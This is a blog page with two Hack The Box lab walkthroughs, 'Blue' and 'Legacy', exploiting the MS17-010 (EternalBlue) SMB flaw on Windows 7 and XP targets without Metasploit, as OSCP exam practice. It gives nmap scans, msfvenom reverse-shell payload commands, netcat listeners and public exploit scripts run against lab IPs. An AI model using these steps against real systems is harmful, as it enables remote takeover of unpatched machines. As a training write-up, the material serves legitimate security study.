TCERT

Category: htb

  • Taking down Blue (a window machine), without using Metasploit

    Taking down Blue (a window machine), without using Metasploit

    Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

    nmap -sC -sV 10.10.10.40 -o nmap1.log
    PORT STATE SERVICE VERSION [6/13]
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
    nmap --script smb-vuln* -o smb-vuln.log 10.10.10.40
    Nmap scan report for 10.10.10.40 Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| VULNERABLE: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| State: VULNERABLE 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

    After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

    git clone https://github.com/helviojunior/MS17-010.git

cd MS17-010

    We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

    I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

    Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

    searchsploit MS17-010

    cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

    Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

    You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

    Once modification is done then follow the following steps..

    I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

    nc -lvp 1234

    And on another shell

    python 42315.py 10.10.10.40

    Once you are successful, you will get the system32 prompt like the screenshot below..


    User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

    Finally the root flag…

  • Taking down Legacy (A Window Machine) without using Metasploit

    Taking down Legacy (A Window Machine) without using Metasploit

    Hello guys,
    Today I am going to take down one simple box from Hack The Box. Recently I purchased a VIP lab access. By the way, the machine name is called Legacy and it’s a window machine.

    This is my first write-up of machines from that lab.

    Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..

    Overview:

Machine IP: 10.10.10.4
Kali Linux : 10.10.14.10

Target:
1. To get the user flag
2. To get the root flag

    Information Gathering Phase:

    nmap -sC -sV 10.10.10.4 -Pn
    Nmap scan report for 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

    From the above result, we can conclude that the target machine is running Window XP and, it has port 139 and 445 opened. Besides, it is running Samba server.

    If you want to know more, you can also perform the above command with -v option. (However, the screenshot attached was the result of command without the -v option)

    nmap -sC -sV -v -p139,445 10.10.10.4 -o nmap.log -Pn

    Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can help us to get a better vulnerability detail and, it will also recommend related exploits if it has any.

    nmap --script smb-vuln* -o nmap_smb_vul.log -Pn 10.10.10.4
    PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    You can clearly see that it has suggested two exploits however, since the first exploit is having some issue (which I colored red) therefore, I am going to use the second exploit. (Note: I must share with you that it is not absolute approach, because sometimes a minor changes in the exploit might work, so try to fix the issues of the first exploit if time permits you).

    Although I found many exploits regarding MS17-010, I am going to do it without using Metasploit (which is a powerful automating framework or tool). So let’s do some shopping through online.

    We are going to clone a GitHub link… (there will be many GitHub account having the exploit details of MS17-010. But, we need one with “send script” (send_and_execute.py) to send the exploit from our Host Machine (Kali Linux) to that Remote Machine(Window Machine). Since many GitHub repository doesn’t have the script send_and_execute.py therefore I am emphasizing about it. Perhaps if you read further you might get to know the importance of it)

    git clone https://github.com/helviojunior/MS17-010

cd MS17-010


    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

    I was little skeptical using msfvenom at the beginning as in the OSCP exam, we are allowed to use Metasploit only twice (and my plan is not to use any). Nevertheless, after reading couple of blogs of senior OSCPians, I understood we can use msfvenom and they discouraged to use Meterpreter.

    -p payload 
LHOST localhost 
LPORT Local Port 

I might need to explain a little regarding EXITFUNC=thread 
-  This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. 
- thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) 
- To know more, kindly visit this link 

-f output format 
-a architecture 
-o output file and path

    If you have observed carefully, you might have noticed that our exploit MS17-010.exe (is using payload windows/shell_reverse_tcp) will provide us a reverse connection to our Kali Linux Machine (or Local Host) on LPORT 1234.

    Therefore, I will wait a reverse connection to my LHOST at LPORT 1234.

    nc -lvp 1234

    And on another Terminal (remember to cd ms17-010 folder if you are freshly opening a Terminal), perform the following command. (By the way, I highly recommend you to use tmux tool to split the terminal to enhance your productivity)

    python send_and_execute.py 10.10.10.4 ms17-010.exe

    Yes, if you are successful; on your terminal (which was listening at port 1234 will get the reverse connection), you will see like the following screenshot. (Focus on the highlight area)

    I will not bore you with my English (Tibetish lol), so I have attached the following steps in screenshot.

    That’s all guys … See you in the next post 🙂